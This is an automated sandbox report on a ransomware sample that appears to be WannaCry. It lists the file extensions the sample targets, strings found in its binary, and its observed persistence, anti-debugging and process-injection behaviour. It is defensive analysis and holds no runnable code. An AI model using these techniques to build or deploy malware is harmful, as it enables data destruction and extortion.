@.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
                Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
                Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: HFKDS6VcNO.dllStatic file information: File size 5267459 > 1048576
                Source: HFKDS6VcNO.dllStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000
                Source: C:\Windows\tasksche.exeCode function: 19_2_00407710 push eax; ret 19_2_0040773E
                Source: C:\Windows\tasksche.exeCode function: 19_2_004076C8 push eax; ret 19_2_004076E6
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,4_2_00B03D36

                Persistence and Installation Behavior

                barindex
                Drops executables to the windows directory (C:\Windows) and starts them
                Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\WINDOWS\mssecsvc.exeJump to behavior
                Source: C:\Windows\mssecsvc.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvc.exeJump to dropped file
                Source: C:\Windows\mssecsvc.exeFile created: C:\Windows\tasksche.exeJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvc.exeJump to dropped file
                Source: C:\Windows\mssecsvc.exeFile created: C:\Windows\tasksche.exeJump to dropped file
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Windows\mssecsvc.exeSpecial instruction interceptor: First address: 0000000000A71746 instructions caused by: Self-modifying code
                Source: C:\Windows\mssecsvc.exeSpecial instruction interceptor: First address: 0000000000A6B1E4 instructions caused by: Self-modifying code
                Contains functionality to detect sleep reduction / modifications
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B041784_2_00B04178
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA41784_2_7FEA4178
                Source: C:\Windows\System32\svchost.exe TID: 1516Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0042D rdtsc 4_2_00B0042D
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA41784_2_7FEA4178
                Source: C:\Windows\mssecsvc.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicvss
                Source: svchost.exe, 00000015.00000002.924540378.00000259A2C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Block any inbound traffic for vmicshutdown
                Source: svchost.exe, 00000015.00000000.494424403.00000259A2355000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Allow inbound TCP port 389 traffic for vmicheartbeateLMEMpPP>
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@vmicshutdown-block-out
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Block any other outbound traffic for vmicheartbeat
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicheartbeat-block-out
                Source: mssecsvc.exe, 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp, mssecsvc.exe.2.drBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~3
                Source: mssecsvc.exe, 00000006.00000002.474520495.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.417080542.00000265FA028000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.911407016.00000265FA028000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.921277233.000002974C24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.910487765.0000029746A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: dwm.exe, 00000012.00000000.429047490.000002456A8D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: svchost.exe, 00000015.00000000.494424403.00000259A2355000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 389 traffic for vmicheartbeatLMEMppR>
                Source: dwm.exe, 00000012.00000000.429047490.000002456A8D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicshutdown-block-in
                Source: svchost.exe, 0000001C.00000000.541476652.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.912268978.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Microsoft-Windows-Hyper-V-Hypervisor
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@vmicheartbeat
                Source: svchost.exe, 00000018.00000002.918198542.000002670BC29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
                Source: svchost.exe, 0000001F.00000002.922351106.000002974C275000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@Hyper-V RAW
                Source: mssecsvc.exe, 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp, mssecsvc.exe.2.drBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
                Source: svchost.exe, 0000000D.00000000.408671976.00000201374E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                Source: svchost.exe, 0000000D.00000002.925470706.0000020137E00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000|
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicvss-block-in
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@vmicheartbeat-allow-out
                Source: svchost.exe, 0000000D.00000002.923251858.0000020137636000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicshutdown
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@Allow inbound TCP port 636 traffic for vmicheartbeat
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicvss
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@vmicheartbeat-allow-in-2
                Source: svchost.exe, 0000001C.00000000.540958832.000002BE77DB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
                Source: svchost.exe, 00000011.00000002.910218493.000001B089649000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Allow inbound TCP port 389 traffic for vmicheartbeat
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicshutdown
                Source: svchost.exe, 00000015.00000002.924540378.00000259A2C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@Block any outbound traffic for vmicshutdown
                Source: svchost.exe, 0000000D.00000000.408671976.00000201374E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                Source: lsass.exe, 00000008.00000000.393818291.0000025A3127F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                Source: svchost.exe, 0000000E.00000000.416919302.00000265FA013000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.910602777.00000265FA013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: svchost.exe, 00000015.00000002.924540378.00000259A2C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Allow outbound TCP traffic for vmicheartbeat
                Source: svchost.exe, 0000000D.00000002.922808083.0000020137613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicshutdownss
                Source: svchost.exe, 00000015.00000000.494424403.00000259A2355000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 636 traffic for vmicheartbeatLMEMppA>
                Source: svchost.exe, 00000015.00000002.934684956.00000259A350E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Allow outbound TCP traffic for vmicheartbeatLMEM`Pa>
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicheartbeat-allow-in-1
                Source: svchost.exe, 0000000D.00000002.922808083.0000020137613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicshutdown
                Source: mssecsvc.exe, 00000006.00000002.474520495.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                Source: svchost.exe, 0000001C.00000002.921218277.000002BE78712000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.0NULLSCSI0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\4&2509f6e&0&00A8
                Source: lsass.exe, 00000008.00000000.401079959.0000025A31213000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.393292577.0000025A31213000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.908814579.0000025A31213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.492983771.00000259A18B5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.918198136.00000259A18B5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.907795071.0000014583A29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.504278323.0000014583A29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.512645663.000002670BC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.918774408.000002670BC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.541476652.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.912268978.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000015.00000002.934684956.00000259A350E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@Allow outbound TCP traffic for vmicheartbeatLMEM`
                Source: lsass.exe, 00000008.00000000.393818291.0000025A3127F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                Source: svchost.exe, 00000015.00000000.494424403.00000259A2355000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 636 traffic for vmicheartbeatTSPLMEMp`@>
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Block any other inbound traffic for vmicheartbeat
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicheartbeat
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicheartbeat
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@Block any outbound traffic for vmicvss
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicvss-block-out
                Source: svchost.exe, 0000001C.00000000.541476652.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.912268978.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Microsoft-Windows-Hyper-V-Hypervisor
                Source: svchost.exe, 00000023.00000000.581815027.0000029D10802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: lsass.exe, 00000008.00000000.393818291.0000025A3127F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicheartbeat-block-in
                Source: mssecsvc.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Driver
                Source: svchost.exe, 0000001C.00000000.540958832.000002BE77DB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 2.0 NULL
                Source: svchost.exe, 0000000D.00000002.922808083.0000020137613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicheartbeat
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@Block any inbound traffic for vmicvss
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,4_2_00B03D36
                Source: C:\Windows\tasksche.exeCode function: 19_2_004029CC free,GetProcessHeap,HeapFree,19_2_004029CC
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0042D rdtsc 4_2_00B0042D
                Source: C:\Windows\mssecsvc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B005F2 mov eax, dword ptr fs:[00000030h]4_2_00B005F2
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0042D mov eax, dword ptr fs:[00000030h]4_2_00B0042D
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0025E mov edx, dword ptr fs:[00000030h]4_2_00B0025E
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA05F2 mov eax, dword ptr fs:[00000030h]4_2_7FEA05F2
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA025E mov edx, dword ptr fs:[00000030h]4_2_7FEA025E
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA042D mov eax, dword ptr fs:[00000030h]4_2_7FEA042D
                Source: C:\Windows\mssecsvc.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\winlogon.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\lsass.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\dwm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
